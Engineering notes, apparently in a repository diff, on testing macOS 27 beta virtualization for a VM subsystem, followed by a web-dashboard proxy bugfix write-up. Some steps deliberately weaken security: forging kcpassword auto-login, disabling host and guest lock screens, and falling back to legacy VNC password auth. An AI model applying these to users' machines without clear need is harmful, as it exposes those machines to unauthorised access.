- **tart is now `openai/tart`** (moved from cirruslabs, mid-2026) and **relicensed to FSL-1.1-ALv2** (no longer permissive). Provisioning support shipped in 2.33.0. Old cirruslabs URLs and license assumptions are stale.
|
||||
- VirtualBuddy shipped provisioning ("Skip Setup Assistant") in 2.2 betas; had to add account-detail validation and a workaround installer for the cross-version bug below.
|
||||
- lima is deliberately waiting for GA before touching macOS 27 APIs.
|
||||
- **Code-Hex/vz (Go bindings) is dormant** (no commits since Feb 2026, no macOS 27 APIs), so the entire Go ecosystem (podman-machine, colima) currently has no path to these APIs. Swift is the only realistic binding today, which validates the VM subsystem's Swift-helper design.
|
||||
- Useful pattern if ever supporting older SDKs: resolve new classes via `NSClassFromString` at runtime (no link-time dependency), fail gracefully when absent.
|
||||
- **Cross-version restore bug**: installing a macOS 27 guest from IPSW on a macOS 26 host fails at 77-78% (`VZErrorDomain 10007`); fixed in 26.6b3 + Xcode 27b4 era, with a nasty MobileDevice.pkg trap (installing it from Xcode 27 beta on a 26 host requires a full macOS reinstall to undo). Not relevant to our 27-host testbed, very relevant to anyone on a 26 host.
|
||||
|
||||
## 8. Our empirical results (beta 4, 26A5388g, MacBook Air M3, 2026-07-29)
|
||||
|
||||
Prototype tooling, all in `~/vm-lab/` on the testbed, compiled with CLT-only `swiftc` and ad-hoc signed with the single virtualization entitlement:
|
||||
|
||||
| Tool | Purpose |
|
||||
| --- | --- |
|
||||
| `vzboot.swift` | Linux guest: EFI boot + virtio disk/net/entropy + NAT + optional cloud-init seed ISO + serial on stdio |
|
||||
| `vzstack.swift` | Same, but boots a DiskImageKit stack (read-only raw base + ASIF overlay) |
|
||||
| `vzmac.swift` | macOS guest: `install` (IPSW restore into a bundle) and `run` (boot, `--provision` for first-boot account/SSH) |
|
||||
| `vzmacgui.swift` | macOS guest in a real window via `VZVirtualMachineView` (required for the guest to render at all) |
|
||||
| `setup-seed.sh` | Builds a cloud-init NoCloud seed ISO with `hdiutil makehybrid` (volume label `cidata`) |
|
||||
| `vncproxy.py` | RFB proxy that advertises only security type 2, so version-skewed/browser clients can authenticate |
|
||||
| noVNC + `websockify` | Browser access; `websockify --web noVNC-<ver> 0.0.0.0:<port> 127.0.0.1:<proxy>` |
|
||||
| `vmwatchdog.sh` + `vmaccess.sh` | Supervision: root LaunchDaemon that restarts a blind/dead runner, re-points the forward, re-applies `pmset`, re-arms keep-awake; plus a keeper for the proxy/web endpoints |
|
||||
|
||||
Host-side diagnostics written during this work (in the session scratchpad, not on the testbed): `vnclogin.py` (Apple DH auth + session open, distinguishes "credentials rejected" from "authorized but session refused"), `vncshot.py` (decodes the raw framebuffer to PNG and reports non-black pixel counts, plus optional synthetic wake input), `relay.py` (plain TCP relay used to bridge a tailnet peer to a LAN-only host), `sshpw.py` (pty-driven password SSH for the one-time key bootstrap into a freshly provisioned guest).
|
||||
|
||||
### Proven working
|
||||
|
||||
1. **Boot**: Debian 12 arm64 cloud images (nocloud and genericcloud variants) boot under `VZEFIBootLoader` + `VZGenericPlatformConfiguration`.
|
||||
2. **Networking**: `VZNATNetworkDeviceAttachment` gives the guest a `192.168.64.x` DHCP lease from the host's bootpd (leases visible in `/var/db/dhcpd_leases`, bridge is `bridge100`).
|
||||
3. **cloud-init provisioning**: NoCloud seed ISO (built with `hdiutil makehybrid -iso -joliet -default-volume-name cidata`) created a `codeman` user with SSH key + passwordless sudo on first boot; `ssh codeman@<lease-ip>` from the host works with key auth.
|
||||
4. **DiskImageKit stack mechanics**: opening a raw base `.readOnly`, appending an ASIF overlay (`ASIFCreationConfiguration.layer(url:type:.overlay)`), attaching via `init(diskImage:)`, and booting it. The overlay received ~44 MB of boot-time writes while the **base file's SHA-256 stayed bit-identical**, which is the write-isolation property the whole per-case design rests on.
|
||||
5. **Reattach**: reopening an existing overlay and `appending(consuming:)` onto the same base passes UUID validation.
|
||||
6. **macOS guest install (added later the same day)**: `VZMacOSInstaller` restore of the 27.0 IPSW (26A5388g, fetched from the seed CDN via appledb; same build as host) into a sparse 64 GiB raw disk + auxiliary storage: INSTALL-OK on the first attempt, ~25 minutes.
|
||||
7. **Headless guest provisioning WORKS**: `VZMacGuestProvisioningOptions` via `setGuestProvisioning` (username, password, `enablesRemoteLogin`, `logsInAutomatically=false`) produced, with zero GUI interaction: an account with full admin (groups include `80(admin)`, `com.apple.access_ssh`), Remote Login on from first boot, port 22 reachable ~140 s after first-boot start, hostname auto-derived from the account ("Codemans-Virtual-Machine"). SSH password auth is on by default, so the bootstrap path is: pty-driven password login once to install `authorized_keys`, key auth thereafter. Note the provisioned account's sudo is NOT passwordless (`echo <pass> | sudo -S ...`), and provisioning is first-boot-only (later boots take no options and just boot).
|
||||
8. **Slot-leak bug NOT reproduced on 26A5388g**: a guest-initiated `shutdown -h now` fired `guestDidStop` cleanly and an immediate relaunch started fine (SSH-ready again in ~75 s), so FB22967193 (VM slot leaked on guest-initiated shutdown, host reboot to recover) did not manifest after one cycle. Either fixed in beta 4 or needs more cycles to trigger.
|
||||
|
||||
### Unstable / under investigation (beta-quality territory)
|
||||
|
||||
Boot reliability degraded over a ~15-VM session on one host boot, ending with reproducible silent hangs (VM process alive, 0% CPU, no DHCP, no ARP, nothing on serial):
|
||||
|
||||
- A genericcloud base that had been booted read-write once (cloud-init first boot) subsequently hung on every boot **with the seed ISO still attached**, while booting **without** the seed succeeded, then later runs failed in both configurations. The seed correlation is strong but was observed while host state was already suspect, so it needs a retest from a clean baseline.
|
||||
- The first stack-boot "success" that later wedged turned out (via DHCP lease timestamp arithmetic) never to have reached the network at all; its overlay growth was pre-network boot writes.
|
||||
- Working hypothesis, matching a class of acknowledged beta bugs (e.g. the VM-slot counter that leaks on guest-initiated shutdown, FB22967193, where only a host reboot recovers): accumulated hypervisor/vmnet state on the host degrades boots. Requires a host reboot + a disciplined retest matrix to confirm.
|
||||
|
||||
### Display rendering: the single most important operational finding
|
||||
|
||||
**A VZ macOS guest renders nothing unless a `VZVirtualMachineView` is attached AND the host session is actually drawing.** Verified byte-for-byte: the guest's own screen sharing serves an all-zero framebuffer (0 non-black bytes across 400 KB samples, with a sane pixel format: `rmax/gmax/bmax = 255`, shifts 16/8/0), in-guest `screencapture` fails with "could not create image from display", and no `IODisplayWrangler` shows up in the guest's `ioreg`. Three distinct states all produce black:
|
||||
|
||||
1. **Headless** (VM run with no view attached).
|
||||
2. **View attached, host session locked.** The lock screen suspends drawing and the guest's virtual GPU produces no frames.
|
||||
3. **View attached, but the app lost its WindowServer connection** (see the incident below): black permanently until the app is restarted.
|
||||
|
||||
**Consequence for the VM subsystem: rendering is a first-class requirement, not an optional extra (owner decision 2026-07-29).** The product serves GUI desktops: mandatory for macOS guests, optional-but-supported for Linux guests (which can also run headless over SSH). Any VM in GUI mode must be launched by an app that attaches a `VZVirtualMachineView`, from inside a host GUI session that is logged in and unlocked. That makes the following non-negotiable parts of the design, not workarounds:
|
||||
|
||||
- VMs run as **GUI apps in the console user's session** (launched via a LaunchAgent or `launchctl asuser`), never as daemons.
|
||||
- The **host must auto-login and never lock or sleep**; a locked host is equivalent to a powered-off display for every VM on it.
|
||||
- The **guest must auto-login, never lock, and have its first-login assistant pre-suppressed**, or the "desktop" a user connects to is a password prompt or a setup wizard.
|
||||
- A VM app that loses its WindowServer connection is **permanently blind** and must be restarted; supervision has to detect that, not just check that the process is alive.
|
||||
- The **2-concurrent-macOS-VM cap** becomes a real capacity limit for the product, so it must be surfaced in the UI and tested (still untested worldwide as of this writing).
|
||||
|
||||
### Incident 2026-07-29: `killall -HUP loginwindow` (never do this on a remote Mac)
|
||||
|
||||
Applying a wallpaper change on the testbed with `killall -HUP loginwindow` restarted the host's login session. Three consequences:
|
||||
|
||||
1. **The Mac dropped off the tailnet entirely.** Tailscale's App Store build is a GUI app living in the user session, so killing the session killed the VPN; remote access was gone until someone logged in. Recovery came from a second machine on the same LAN: it could still SSH in, and then relay ports back over the tailnet (a plain TCP relay on a tailnet-connected LAN peer is a good out-of-band path worth keeping ready).
|
||||
2. **The VM app lost its WindowServer connection** (`HIToolbox: received notification of WindowServer event port death`) while surviving as a process. Every later black screen traced to this, and nothing guest-side could fix it; only restarting the app restored rendering.
|
||||
3. The session's `caffeinate` died, so the host resumed auto-locking.
|
||||
|
||||
Rule: on a remote Mac, never run session-level commands (`killall -HUP loginwindow`, `pkill -u <user>`, logout, fast user switching). `killall WallpaperAgent` alone is session-safe. Before any such command, enumerate what depends on that session: VPN, VM processes, port forwards, keep-awake helpers.
|
||||
|
||||
### Keeping host and guest usable unattended
|
||||
|
||||
- **Host**: `caffeinate -d -i -m -u` prevents display sleep but does NOT override the lock policy. "Require password after screen saver begins or display is turned off → Never" must be set in System Settings; it needs the account password, so a passwordless-sudo shell cannot script it, and turning it off does NOT dismiss a lock that is already engaged (one more unlock is always needed). `pmset -a disablesleep 1` keeps a lid-closed laptop awake but **does not survive a reboot**, and OS updates reset it too, so a supervisor should re-apply it rather than assume it sticks.
|
||||
- **Rebooting an encrypted host**: use `sudo fdesetup authrestart`. FileVault's pre-boot unlock doubles as the login, so the machine returns with a **live logged-in console session** and encryption intact, no password prompt, and supervision can then bring the VMs back by itself. Verified 2026-07-30. A plain `reboot` parks at the lock screen and blacks out every VM until a human logs in.
|
||||
- **Guest**: set `autoLoginUser` plus a valid `/etc/kcpassword` (XOR-obfuscated password file, key `7D 89 52 23 D2 BC DE A3`, payload zero-padded to a multiple of 12). `sysadminctl -autologin` fails with `SACSetAutoLoginPassword error:22` on provisioned accounts, and a fresh guest has no Python, so generate the bytes on the controlling host and copy them in. Then `pmset -a displaysleep 0 sleep 0 disablesleep 1`, `defaults -currentHost write com.apple.screensaver idleTime 0`, `defaults write com.apple.screensaver askForPassword 0`, and `caffeinate` inside the guest. ⚠ `autoLoginUser` was observed being wiped by failed `sysadminctl -autologin` attempts; verify it after each boot until stable.
|
||||
- **Wallpaper**: animated "aerials" wallpaper is brutal over VNC. The provider lives in `~/Library/Application Support/com.apple.wallpaper/Store/Index.plist` under several keys (`AllSpacesAndDisplays:Desktop`, `:Idle`, and `SystemDefault:*` which is what the login/lock screen uses). Switch each `Provider` to `com.apple.wallpaper.choice.solid-color` with PlistBuddy and restart `WallpaperAgent`. The login-window copy is cached and only refreshes on a later login cycle.
|
||||
|
||||
### Remote GUI/SSH access to a guest (recipe, verified 2026-07-29)
|
||||
|
||||
The guest lives on the host-private NAT bridge, so remote access is guest-service + host-forward:
|
||||
|
||||
1. **In the macOS guest** (over ssh), use ONE mechanism, fully activated. The reliable form is Remote Management in a single kickstart call:
|
||||
```
|
||||
sudo .../RemoteManagement/ARDAgent.app/Contents/Resources/kickstart \
|
||||
-activate -configure -access -on \
|
||||
-clientopts -setvnclegacy -vnclegacy yes -setvncpw -vncpw <8-char-pw> \
|
||||
-allowAccessFor -allUsers -privs -all -restart -agent -menu
|
||||
```
|
||||
⚠ **Half-configured states authenticate but refuse the session.** Loading `com.apple.screensharing` while Remote Management is deactivated (or vice versa) produces an Apple-client error that names the wrong culprit: *"Screen Sharing is not permitted on <host>. Disable and re-enable Screen Sharing or Remote Management in System Settings"*. A raw-protocol client can still authenticate AND open a framebuffer in that state, so protocol-level tests pass while every Apple client fails. The remedy is exactly what the dialog says, done over ssh: `launchctl unload -w …screensharing.plist`, `kickstart -deactivate -configure -access -off`, `pkill screensharingd`, then the single activate call above.
|
||||
Notes: `launchctl enable system/com.apple.screensharing` fails with "Could not find service" on this build; `load -w` is the plain-Screen-Sharing path if you deliberately want it instead of Remote Management. Apple clients negotiate `RSA-SRP` (auth type 33) and the guest logs `Authentication: SUCCEEDED :: User Name: … :: Type: RSA-SRP` on success, which is the definitive server-side confirmation.
|
||||
2. **On the host**: a gateway port-forward makes the guest's 5900 reachable from the whole tailnet without per-client tunnels: self-authorize the host's own key, then `ssh -N -g -L 0.0.0.0:5901:<guest-ip>:5900 <user>@localhost` (nohup'd).
|
||||
⚠⚠ **NEVER forward on host port 5900.** If the host has Screen Sharing enabled (our testbed does, from the pre-upgrade checklist), launchd already owns 5900 socket-activated. The `ssh -L` bind then fails with "Address already in use" **while the tunnel process keeps running**, so every symptom of success is present (process alive, port answers, real RFB banner) yet **every connection reaches the HOST's login window, not the guest**. This cost us an hour: guest credentials failed against the host's screensharingd, which reads exactly like broken guest auth, and we chased the (real, but irrelevant) provisioned-account identity bug. Diagnostics that would have caught it instantly: `sudo lsof -nP -iTCP:5900 -sTCP:LISTEN` showing `launchd` rather than `ssh`, or the guest's own logs showing NO auth attempts during a failed login. Always use a distinct host port and verify with `lsof` that the forward owns it.
|
||||
⚠ `-g` binds all interfaces, so the forward is also visible on the host's LAN; the VNC layer still requires the account or VNC password. ⚠ The forward pins the guest IP, which changes per boot under plain NAT; re-point it after a guest reboot (the proper fix is a vmnet DHCP reservation, macOS 26 API, once we move off plain `VZNATNetworkDeviceAttachment`).
|
||||
Verified working: with the forward on 5901, both a provisioned account and a `sysadminctl`-created one authenticate successfully (RFB `SecurityResult` = 0) against the guest. The guest offers security types `[30, 33, 36, 2, 35]`, i.e. Apple DH/SRP **plus classic type 2**, so non-Apple VNC clients work with the legacy password once ARD's `-setvnclegacy` is set. (The host's screensharingd, by contrast, offered no type 2, which is itself a tell that you are talking to the wrong machine.)
|
||||
3. **SSH from any tailnet device**: `ssh -J <host-user>@<host> codeman@<guest-ip>` (jump through the host), after adding the connecting machine's key to the guest's `authorized_keys`.
|
||||
|
||||
**Client-version incompatibility (macOS 27 servers vs older Screen Sharing clients)**: an older Mac's Screen Sharing client fails Apple's `RSA-SRP` handshake against macOS 27 servers, logging `Authentication: FAILED :: User Name: <user> :: Type: RSA-SRP` server-side, while a macOS 27 client authenticates against the same servers without issue. This was verified against BOTH a macOS 27 guest and a macOS 27 host with the operator's own account, so it is a client-side version skew, not configuration, and no server-side change fixes it. Same family as the documented "macOS 26 host cannot install a 27 guest" bug. Practical workaround: bypass Apple auth entirely with classic VNC auth (security type 2), which macOS offers only when Remote Management legacy VNC is enabled. Two ways to consume it: any third-party VNC client, or a browser via noVNC.
|
||||
|
||||
**Browser-based access chain (zero client install, version-proof)**, all hosted on the Mac:
|
||||
```
|
||||
browser --HTTP/WS--> websockify (+ noVNC static files)
|
||||
--> type-2-only proxy # rewrites the server's security-type list to [2]
|
||||
--> ssh -L forward # loopback hop; see the Local Network note below
|
||||
--> guest:5900
|
||||
```
|
||||
Notes learned the hard way: (a) **never bind the forward on host port 5900** (see the launchd warning above); (b) a Python proxy cannot reach the guest subnet directly because macOS **Local Network privacy** denies headless CLI binaries, surfacing as `No route to host`, so point the proxy at a loopback `ssh -L` forward instead (Apple-signed `ssh` is unaffected); (c) noVNC needs `?resize=scale` or Scaling Mode → Local Scaling, otherwise a Retina host screen (2940x1912) is unusable in a browser window; (d) noVNC speaks security type 2 only, which is exactly why the proxy rewrite is needed.
|
||||
|
||||
**Debugging technique that settled all of this**: a ~80-line Python RFB client (scratchpad `vnclogin.py`) that implements Apple DH auth (security type 30) and continues through `ClientInit`/`ServerInit`. It reports the server's `SecurityResult` plus the framebuffer size and desktop name, which separates "credentials rejected" from "authorized but session refused" without any GUI client. Pair it with `log stream --predicate 'process == "screensharingd"'` inside the guest, and drive a REAL Apple client headlessly from the host with `sudo launchctl asuser <uid> sudo -u <user> osascript -e 'tell application "Screen Sharing" to open location "vnc://user:pass@host:port"'`, verifying the result via `lsof -nP -iTCP -a -p <pid>` (an ESTABLISHED socket to the target) since `screencapture` fails on a lid-closed laptop ("could not create image from display"). Tailscale was never implicated: both the raw client and Apple's client work over the tailnet address once the guest service is fully activated.
|
||||
|
||||
### Hard-won operational lessons (write these into any tooling)
|
||||
|
||||
- **Silent serial is normal, not failure.** Debian's GRUB/kernel log to the graphics console; nothing attaches a getty to hvc0 by default. The reliable boot signal is the DHCP lease (or passive `tcpdump -i bridge100`), never the serial port and never a quick ping (BSD ping's first packet often dies to ARP latency; passive capture showed "dead" guests alive).
|
||||
- **DHCP lease entries carry truth**: `name=` shows the guest hostname, and the lease timestamps order events; stale entries linger, so compare timestamps before attributing a lease to a boot.
|
||||
- **Never boot a base image read-write.** Every RW boot mutates it (dhclient lease cache, journal, cloud-init state) and destroys experiment reproducibility, exactly why the production design only ever boots bases under overlays. Provision INTO the base once at base-build time, or provision per-case overlays with the seed, then detach the seed.
|
||||
- **A killed SSH client does not kill a remote `nohup`'d VM**, and the survivor holds the EFI variable store lock: "The EFI variable store is already in use" (`VZErrorDomain 50002`) means a zombie VM process, `pkill` it.
|
||||
- **EFI variable stores are per-VM state.** Fresh stores boot reliably; reuse across different VM instances is at minimum suspect on this beta (Apple's own guidance for cloned VMs is one store per VM). Cheap policy: one store per case, created with the overlay, deleted with it.
|
||||
- **Downloads from cloud.debian.org mirrors truncate silently**; always verify byte count against origin `Content-Length` and resume with `curl -C -`.
|
||||
- The remote host's default shell is zsh: `=` -prefixed words (`echo ===`) explode via zsh's `=cmd` expansion; keep separators zsh-safe in automation.
|
||||
|
||||
### The 2-concurrent-macOS-VM cap: TESTED AND CONFIRMED on macOS 27 beta 4 (2026-07-29)
|
||||
|
||||
We measured it, which as far as we can tell nobody had published for macOS 27. Method: `cp -c -R` the guest bundle (APFS clonefile, instant and **zero additional disk**), regenerate the machine identifier per clone (`VZMacMachineIdentifier()` written to `machine.id`; the hardware model is reused), then launch VMs until one is refused.
|
||||
|
||||
Result: VM #1 (8 GB, GUI) and VM #2 (4 GB, headless) ran concurrently without complaint. VM #3 was refused **instantly** at `vm.start`:
|
||||
|
||||
```
|
||||
VZErrorDomain Code=6 "The maximum supported number of active virtual machines has been reached."
|
||||
NSLocalizedFailure = "The number of virtual machines exceeds the limit."
|
||||
```
|
||||
|
||||
**This is a licensing/kernel quota, not a resource limit**: the refusal came with **39% of system memory free** on a 16 GB host, and adding RAM or CPU cannot raise it. It matches the pre-27 behavior (`hv_apple_isa_vm_quota`), so nothing changed in 27 despite the framework's other additions. Linux guests are unaffected and are bounded only by host resources.
|
||||
|
||||
Design consequences: macOS-guest capacity per host is **hard-capped at 2**, so a GUI-macOS-per-case product must schedule around it (queue, evict idle VMs, or scale across hosts) and surface it in the UI. Also relevant: the acknowledged slot-leak bug (a guest-initiated shutdown failing to release a slot, recoverable only by host reboot) is far more damaging under a cap of 2 than it sounds; we did not reproduce it on beta 4, but any scheduler should treat "slot appears used but nothing is running" as a real state.
|
||||
|
||||
### Not yet tested
|
||||
- Cache layers (`LayerType.cache`), `.overlay(blockCount:)` disk growth, stack depth performance, VirtioFS + stack combination, `truncate`, ASIF disks for macOS guests (raw used so far; ASIF has the reclamation bug).
|
||||
- One more scripting lesson from this session: inner `ssh` calls inside a piped `sh -s` script MUST use `-n`, or they consume the remainder of the script from stdin and it silently never runs.
|
||||
|
||||
### Session timeline (what was actually established, 2026-07-29)
|
||||
|
||||
Linux path: base image download (with resume, mirrors truncate) → `vzboot` compiles against the beta SDK first try → EFI boot → NAT DHCP lease → cloud-init seed provisions a user with the host's SSH key → `ssh` into the guest works → DiskImageKit stack boots with an ASIF overlay taking all writes while the base stays SHA-identical. Later Linux boots became unreliable on an un-rebooted host (silent hangs, 0% CPU, no DHCP); a clean-baseline retest is still pending.
|
||||
|
||||
macOS path: seed-CDN IPSW (matched to the host build) → `VZMacOSInstaller` restore, ~25 min, first try → first boot with `VZMacGuestProvisioningOptions` creates an admin account with Remote Login on, no interaction needed, SSH reachable ~140 s later → key bootstrap over a one-time password login → guest shutdown/relaunch clean (the slot-leak bug did not reproduce) → GUI access fought through a port collision, a client-version incompatibility, the rendering dependency, and a self-inflicted session kill, ending with a browser-based path plus a guest hardened to auto-login and never lock.
|
||||
|
||||
**Lifecycle verified (stop → start), 2026-07-30**: an in-guest `shutdown -h now` fires `guestDidStop` and the runner app exits on its own; relaunching from the same bundle boots the guest in ~2 minutes straight into an auto-logged-in desktop, and the VM slot is released cleanly (an immediate restart works, so the slot-leak bug did not bite). Two operational notes: the guest takes a **new NAT lease on every boot**, so any port-forward must be re-pointed (or use a vmnet DHCP reservation), and a host reboot resets `pmset -a disablesleep`.
|
||||
|
||||
⚠ **Provisioning does NOT skip the per-user first-login assistant.** `VZMacGuestProvisioningOptions` skips the initial Setup Assistant (account creation, region, Apple Account) so the machine is immediately reachable, but the first time anyone actually logs into a desktop, macOS still presents its per-user wizard (Apple Intelligence, Siri, privacy, appearance, Touch ID). The operator hit exactly this. For a GUI-first product this MUST be pre-suppressed during base-image creation by writing `com.apple.SetupAssistant` keys for every account that will log in, and into `/System/Library/User Template/English.lproj/Library/Preferences/` so accounts created later inherit it.
|
||||
|
||||
⚠ **A partial key list is worse than none**, because the wizard simply shows the panes you missed and the operator has to click through them again after every fresh login (we hit this twice). The set that finally silenced macOS 27 beta 4: `DidSeeCloudSetup`, `DidSeeSiriSetup`, `DidSeePrivacy`, `DidSeeAppearanceSetup`, `DidSeeTouchIDSetup`, `DidSeeAvatarSetup`, `DidSeeScreenTime`, `DidSeeApplePaySetup`, `DidSeeSafariImport`, `DidSeeAccessibility`, **`DidSeeActivationLock`, `DidSeeAppStore`, `DidSeeLockdownMode`** (the three easy to miss), plus the Express-Settings flags **`SkipExpressSettingsUpdating`** and **`SkipFirstLoginOptimization`**, and the version markers `LastSeenCloudProductVersion` / `LastSeenBuddyBuildVersion` / `PreviousSystemVersion` / `PreviousBuildVersion` matching the guest build. Verify afterwards by reading the domain back and checking that no `DidSee*` key is still `0`. Note these keys change between macOS releases, so base-image creation should re-verify per OS version rather than trust a hardcoded list.
|
||||
|
||||
## 9. Design implications for Codeman's VM subsystem
|
||||
|
||||
0. **GUI is a first-class mode, and for macOS guests it is the whole point (owner decision, 2026-07-29).** The subsystem serves real desktops, not only headless SSH boxes. macOS guests are GUI-only in practice (nothing renders without an attached view). Linux guests are supported in BOTH modes: GUI when the case wants a desktop, headless-over-SSH when it wants a cheap agent sandbox. The costs of the GUI path are in §8 "Display rendering": VMs as GUI apps in a live session, a host that never locks, guests that auto-login with their first-login wizard pre-suppressed, and the macOS concurrency cap as a real capacity limit.
|
||||
1. **The macOS-specific liabilities are accepted costs, not reasons to avoid macOS guests**: provisioning is macOS-only and first-boot-only, ASIF space reclamation is broken for macOS guests on the beta (use RAW disks for macOS guests until fixed), and the 2-VM cap applies. Plan around each: RAW-backed macOS disks, provisioning baked into base-image creation, and capacity limits surfaced in the UI.
|
||||
2. **Base immutability is not just hygiene, it is load-bearing**: DiskImageKit's UUID invalidation plus our sha-stability proof make a read-only shared base per image-generation the core artifact. Bases are built once (seed attached), then only ever opened `.readOnly` under per-case overlays.
|
||||
3. **Seed ISOs are a base-build-time tool only.** Never attach a seed to a routine case boot (correlated with boot hangs on the beta, and semantically wrong anyway since cloud-init already ran).
|
||||
4. **Per-case files**: overlay ASIF + EFI variable store live and die together with the case.
|
||||
5. **Export = ship the layer chain** (base ref + overlay + manifest), not flatten; there is no flatten API. In-guest `dd` to a fresh image is the fallback for a true single-file export.
|
||||
6. **Health checking must be lease/API based**, not serial/ping based, and Codeman's `codeman-vm status` should read `/var/db/dhcpd_leases` (or use vmnet DHCP reservations for deterministic per-case IPs, a macOS 26 API).
|
||||
7. **Run `fstrim` periodically in Linux guests** (or mount with discard) so overlays stay sparse.
|
||||
8. **Entitlements plist stays minimal** (exactly `com.apple.security.virtualization`) to dodge the AMFI/watchdog traps.
|
||||
9. **Expect beta churn**: pin findings to build numbers (this doc: 26A5388g) and retest each beta; the framework binaries changed every beta so far.
|
||||
10. **A macOS guest is only "ready" when its desktop is ready**, which is a stricter bar than "the VM booted". Readiness means: VM app running with a live WindowServer connection, guest auto-logged-in (not at a login or lock screen), first-login assistant suppressed, and the guest's screen sharing serving a non-black framebuffer. Health checks should sample the framebuffer for non-black content, because every failure mode in this session (headless run, locked host, dead WindowServer, locked guest, setup wizard) presents as a perfectly healthy-looking process with a black or useless screen.
|
||||
10b. **Supervision must run as a root LaunchDaemon.** A user LaunchAgent cannot launch a GUI app into the Aqua session; its restarts fail silently (child dies instantly, empty log, supervisor reports success). Root + `launchctl asuser <uid> sudo -u <user> …` works and the launched process persists. This bit us on the first supervisor implementation and is easy to repeat.
|
||||
|
||||
11. **Remote-access plumbing belongs in the helper CLI, not in ad-hoc shell**: a `codeman-vm` implementation should own port selection (never 5900), forward lifecycle across guest IP changes (or better, vmnet DHCP reservations for stable per-case IPs), and a documented browser path, because every failure in this session came from hand-rolled plumbing rather than from the Virtualization APIs themselves.
|
||||
12. **Never let control-plane connectivity depend on a GUI session** on a remote Mac host: prefer a Tailscale system service over the App Store app, and keep a LAN-adjacent peer able to relay as an out-of-band recovery path.
|
||||
|
||||
## Sources
|
||||
|
||||
Apple DocC JSON backend (diskimagekit, virtualization, vmnet trees; macOS 27 release notes) | WWDC26 session 224 https://developer.apple.com/videos/play/wwdc2026/224/ | eclecticlight.co ASIF/virtualization coverage | developer.apple.com/forums threads 839343 (CSIdentity bug), 830118 (cross-version restore), 830119 (VM-slot leak), 830383 (VM cap), 834822 + 831902 (USB entitlements), 822658 (vmnet loopback) | openai/tart issues 1261/1263/1268/1269/1285 | Spooky-Labs provisioning design doc | VirtualBuddy 2.2 release notes | lima-vm discussions | our own test transcripts on the testbed (`~/vm-lab/*.log`, this repo's session)
|
||||
@@ -0,0 +1,190 @@
|
||||
# Web tabs: two fixes (planned + implemented 2026-07-28)
|
||||
|
||||
Both found against the saved dashboard
|
||||
`https://<your-host>.<your-tailnet>.ts.net:4000` (Bio-Hacking-Dashboard).
|
||||
Kept because the root-cause analysis of the second one is not obvious from the
|
||||
resulting diff.
|
||||
|
||||
Status: **both implemented and verified end-to-end.** The one deliberate
|
||||
non-change is recorded at the bottom.
|
||||
|
||||
---
|
||||
|
||||
## Bug 1: saved URLs could not be deleted from the Run dropdown
|
||||
|
||||
### What happened
|
||||
|
||||
The "Web / URL" section of the Run dropdown listed every saved dashboard as a
|
||||
single clickable row whose only action was "open". Deleting required opening the
|
||||
dashboard as a tab, clicking the tab's gear, then Delete in the modal, so a URL
|
||||
you no longer wanted open at all could not be removed without first opening it.
|
||||
|
||||
### What shipped
|
||||
|
||||
- `renderWebviewMenuItems()` (`src/web/public/webview-tabs.js`) now renders each
|
||||
saved URL as a `.run-mode-row--web` flex row: the open button, a gear
|
||||
(`showWebviewModal`), and an `x` (`deleteWebviewById`). Nested buttons are
|
||||
invalid HTML, hence the wrapper rather than a button inside a button.
|
||||
- `deleteWebview()` split into the modal entry point, the new row entry point
|
||||
`deleteWebviewById(id)`, and the shared `_confirmAndDeleteWebview(id)`.
|
||||
- Both side buttons call `event.stopPropagation()` so the click does not also
|
||||
open the dashboard.
|
||||
- The dropdown's outside-click handler (`session-ui.js`) closes when the click
|
||||
target is not inside `#runModeMenu`, and the row is gone by the time the delete
|
||||
resolves, so `deleteWebviewById` re-asserts `.active` on the menu. Verified in a
|
||||
browser: deleting one of several URLs leaves you looking at the rest of the list.
|
||||
- CSS in `styles.css` (`.run-mode-row--web`, `.run-mode-row-btn`) plus a larger
|
||||
touch target in `mobile.css`. The side buttons are permanently visible rather
|
||||
than hover-revealed, because this menu is used on touch.
|
||||
|
||||
No server change: `DELETE /api/webviews/:id` already existed, owner-scoped, and
|
||||
already revoked the capability and broadcast `WebviewChanged`.
|
||||
|
||||
---
|
||||
|
||||
## Bug 2: images did not load in a proxied dashboard
|
||||
|
||||
### Reproduction (before the fix)
|
||||
|
||||
```
|
||||
CAP=<from POST /api/webviews/<id>/open>
|
||||
# A) upstream direct -> 200 image/jpeg 118150
|
||||
curl -sk "https://<your-host>.<your-tailnet>.ts.net:4000/api/hero?slug=120-minutes-in-nature"
|
||||
# B) through the proxy prefix -> 200 image/jpeg 118150
|
||||
curl -sk "https://localhost:3000/webview/$CAP/api/hero?slug=120-minutes-in-nature"
|
||||
# C) what the browser ACTUALLY requested -> 404 {"errorCode":"NOT_FOUND"}
|
||||
curl -sk -H "Referer: https://localhost:3000/webview/$CAP/" \
|
||||
"https://localhost:3000/api/hero?slug=120-minutes-in-nature"
|
||||
# D) same shape but NOT under /api -> 200 (referer fallback rescues it)
|
||||
curl -sk -H "Referer: https://localhost:3000/webview/$CAP/" "https://localhost:3000/styles.css"
|
||||
```
|
||||
|
||||
The proxy itself was fine (B). The failure was entirely about which URL the
|
||||
browser ended up requesting (C).
|
||||
|
||||
### Root cause
|
||||
|
||||
The dashboard builds its image markup at runtime with root-absolute URLs:
|
||||
`c.innerHTML = '<img class="thumb" src="/api/hero?slug=...">'`, `img.src =
|
||||
slideSrc(...)` returning `/api/slide?owner=...`, `/api/story`, `/api/video`, and a
|
||||
nested `<iframe src="/api/preview?slug=...">`.
|
||||
|
||||
All three rewrite layers missed that shape:
|
||||
|
||||
1. `<base href="/webview/<cap>/">` only affects **relative** URLs. A root-absolute
|
||||
`/api/hero` ignores the base path and resolves against Codeman's origin.
|
||||
2. `rewriteHtml()` only runs over the **initial HTML document**. This markup is
|
||||
created later by page script. (The static header `<img src="/api/logo">` DID
|
||||
work, having been rewritten at proxy time, which is why only the
|
||||
runtime-injected images were broken.)
|
||||
3. `runtimeUrlShim()` patched only `fetch`, `XMLHttpRequest.open`, `WebSocket` and
|
||||
`EventSource`, so the dashboard's **data** loaded while its **pictures** did
|
||||
not.
|
||||
|
||||
The safety net was fenced off from `/api` in two places, both deliberate:
|
||||
`server.ts`'s not-found handler returns the API-envelope 404 before reaching
|
||||
`tryWebviewRefererFallback`, and `middleware/auth.ts` refuses the Referer-form
|
||||
auth exemption for `/api/`, `/ws/`, `/q/`.
|
||||
|
||||
### What shipped
|
||||
|
||||
`runtimeUrlShim()` in `src/web/webview-proxy.ts` now also covers the DOM sinks, so
|
||||
a root-absolute `/api/...` request is never emitted in the first place and neither
|
||||
security fence had to move:
|
||||
|
